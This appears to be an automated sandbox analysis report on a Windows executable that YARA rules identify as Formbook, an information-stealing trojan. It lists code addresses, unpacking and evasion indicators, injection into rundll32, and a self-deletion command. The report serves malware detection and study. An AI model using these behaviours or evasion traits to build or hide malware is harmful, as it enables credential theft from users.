Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_04BF80D0	0_2_04BF80D0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_04BF1FC2	0_2_04BF1FC2
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053EAB38	0_2_053EAB38
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E35F0	0_2_053E35F0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E003F	0_2_053E003F
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E0006	0_2_053E0006
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E8870	0_2_053E8870
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E0040	0_2_053E0040
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E84C8	0_2_053E84C8
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E3F37	0_2_053E3F37
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E3F32	0_2_053E3F32
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E5F10	0_2_053E5F10
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E5F68	0_2_053E5F68
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E3F40	0_2_053E3F40
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E2F90	0_2_053E2F90
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E2FF0	0_2_053E2FF0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E2FEF	0_2_053E2FEF
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E43E8	0_2_053E43E8
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E43E7	0_2_053E43E7
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E43D7	0_2_053E43D7
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E526F	0_2_053E526F
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E5280	0_2_053E5280
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00401030	4_2_00401030
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041C273	4_2_0041C273
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041BAA2	4_2_0041BAA2
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00408C5B	4_2_00408C5B
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00408C60	4_2_00408C60
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041BC22	4_2_0041BC22
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041CC24	4_2_0041CC24
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041B4A6	4_2_0041B4A6
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041BD4F	4_2_0041BD4F
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041C501	4_2_0041C501
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00402D87	4_2_00402D87
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00402D90	4_2_00402D90
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041BDBD	4_2_0041BDBD
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041BF3C	4_2_0041BF3C
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041C7A5	4_2_0041C7A5
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00402FB0	4_2_00402FB0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01942581	4_2_01942581
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0192D5E0	4_2_0192D5E0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191F900	4_2_0191F900
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01910D20	4_2_01910D20
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01934120	4_2_01934120
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E1D55	4_2_019E1D55
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0192B090	4_2_0192B090
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019420A0	4_2_019420A0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0192841F	4_2_0192841F
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D1002	4_2_019D1002
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194EBB0	4_2_0194EBB0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01936E30	4_2_01936E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0495B090	9_2_0495B090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A120A8	9_2_04A120A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049720A0	9_2_049720A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0495841F	9_2_0495841F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01002	9_2_04A01002
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04972581	9_2_04972581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0495D5E0	9_2_0495D5E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494F900	9_2_0494F900
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A12D07	9_2_04A12D07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04940D20	9_2_04940D20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04964120	9_2_04964120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A11D55	9_2_04A11D55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A122AE	9_2_04A122AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A12EF7	9_2_04A12EF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04966E30	9_2_04966E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497EBB0	9_2_0497EBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A11FF1	9_2_04A11FF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A12B28	9_2_04A12B28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0090B4A6	9_2_0090B4A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0090CC24	9_2_0090CC24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_008F8C5B	9_2_008F8C5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_008F8C60	9_2_008F8C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_008F2D87	9_2_008F2D87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_008F2D90	9_2_008F2D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0090C7A5	9_2_0090C7A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_008F2FB0	9_2_008F2FB0

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: String function: 0191B150 appears 32 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0494B150 appears 35 times

Source: 457b22da_by_Libranalysis.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 457b22da_by_Libranalysis.exe	Binary or memory string: OriginalFilename vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll( vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.238739853.0000000002CA0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDynamicPartitionEnumeratorForIndexRangeAbstract.exeF vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.238739853.0000000002CA0000.00000004.00000001.sdmp	Binary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.236001012.00000000009E8000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe, 00000004.00000002.277387221.0000000001B9F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe, 00000004.00000000.234003452.0000000000E58000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameDynamicPartitionEnumeratorForIndexRangeAbstract.exeF vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe	Binary or memory string: OriginalFilenameDynamicPartitionEnumeratorForIndexRangeAbstract.exeF vs 457b22da_by_Libranalysis.exe

Source: 457b22da_by_Libranalysis.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: 457b22da_by_Libranalysis.exe

Static PE information: Section: U#j;F_` ZLIB complexity 1.00031723159

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@12/8

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\457b22da_by_Libranalysis.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: 457b22da_by_Libranalysis.exe

ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

File read: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process created: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process created: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'	Jump to behavior

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 457b22da_by_Libranalysis.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 457b22da_by_Libranalysis.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: 457b22da_by_Libranalysis.exe, 00000004.00000003.235743424.0000000001750000.00000004.00000001.sdmp, rundll32.exe, 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 457b22da_by_Libranalysis.exe, rundll32.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

Unpacked PE file: 0.2.457b22da_by_Libranalysis.exe.250000.0.unpack U#j;F_`:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Source: 457b22da_by_Libranalysis.exe	Static PE information: section name: U#j;F_`
Source: 457b22da_by_Libranalysis.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_04BFE0D2 pushad ; ret	0_2_04BFE0E3
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_053E1F08 pushad ; iretd	0_2_053E1F09
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_004161E7 push edi; retf	4_2_004161E8
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_004151B4 pushfd ; ret	4_2_004151D9
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041B3B5 push eax; ret	4_2_0041B408
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041B46C push eax; ret	4_2_0041B472
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041B402 push eax; ret	4_2_0041B408
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041B40B push eax; ret	4_2_0041B472
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041543B pushfd ; iretd	4_2_0041543E
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00415485 push edx; ret	4_2_00415496
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00E3B9FA push ss; retf	4_2_00E3B9FE
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00E38118 push FFFFFF8Fh; retf	4_2_00E3811D
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00E3B346 push cs; retf	4_2_00E3B5D2
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00E3BB44 push ds; retf	4_2_00E3BB54
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00E3BB56 push ds; retf	4_2_00E3BB5A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00E3BB32 push ds; retf	4_2_00E3BB36
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00E38485 push ds; ret	4_2_00E384A8
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00E3ADE3 pushad ; retf	4_2_00E3AE36
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00E3B5F8 push cs; retf	4_2_00E3B60E
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00E3B5C2 push cs; retf	4_2_00E3B5D2
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00E3AE02 pushad ; retf	4_2_00E3AE36
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00E3B610 push cs; retf	4_2_00E3B650
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00E38FD4 push ds; ret	4_2_00E3902C
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0196D0D1 push ecx; ret	4_2_0196D0E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0499D0D1 push ecx; ret	9_2_0499D0E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_009051B4 pushfd ; ret	9_2_009051D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_009061E7 push edi; retf	9_2_009061E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0090B3B5 push eax; ret	9_2_0090B408
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00905485 push edx; ret	9_2_00905496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0090B402 push eax; ret	9_2_0090B408
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0090B40B push eax; ret	9_2_0090B472

Source: initial sample

Static PE information: section name: U#j;F_` entropy: 7.99977911602

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
